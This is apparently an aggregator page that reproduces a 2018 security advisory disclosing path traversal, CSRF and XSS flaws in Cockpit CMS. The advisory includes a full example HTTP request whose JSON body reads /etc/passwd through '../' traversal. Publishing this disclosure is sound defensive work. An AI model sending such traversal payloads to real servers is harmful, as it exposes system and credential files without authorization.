Lucene search
K

Cockpit CMS CSRF / XSS / Path Traversal

🗓️ 12 Oct 2018 00:00:00Reported by Simon UvarovType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 43 Views

Cockpit CMS security vulnerabilities including Path Traversal, CSRF, and XS

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Cockpit CMS CSRF / XSS / Path Traversal Vulnerabilities
12 Oct 201800:00
zdt
CNVD
Agentejo Cockpit Cross-Site Scripting Vulnerability
16 Oct 201800:00
cnvd
CNVD
Agentejo Cockpit Cross-Site Request Forgery Vulnerability
16 Oct 201800:00
cnvd
CNVD
Agentejo Cockpit Directory Traversal Vulnerability
16 Oct 201800:00
cnvd
CVE
CVE-2018-15538
15 Oct 201819:00
cve
CVE
CVE-2018-15539
15 Oct 201819:00
cve
CVE
CVE-2018-15540
15 Oct 201819:00
cve
Cvelist
CVE-2018-15538
15 Oct 201819:00
cvelist
Cvelist
CVE-2018-15539
15 Oct 201819:00
cvelist
Cvelist
CVE-2018-15540
15 Oct 201819:00
cvelist
Rows per page
`#1 Path Traversal  
CVE-2018-15540  
It is possible to read/write/delete files or list directories by using "../" to traverse to other folders via requests to /cockpit/media/api  
  
Example of a vulnerable request:  
  
POST /cockpit/media/api HTTP/1.1  
Host: 192.168.5.129  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.5.129/cockpit/finder  
Content-Type: application/json; charset=UTF-8  
Content-Length: 53  
Cookie: 8071dec2be26139e39a170762581c00f=9me02iusm500432871pq0fjls2  
Connection: close  
  
{"cmd":"readfile","path":"../../../../../etc/passwd"}  
  
#2 Application Wide CSRF  
CVE-2018-15539  
The application lacks anti-csrf protection mechanism, thus, an attacker is able to change API tokens and passwords.  
  
#3 Application Wide XSS  
CVE-2018-15538  
The application is vulnerable to XSS attacks.  
  
The mentioned issues were targeted in the 0.6.2 release.  
  
Regards,  
Simon Uvarov  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation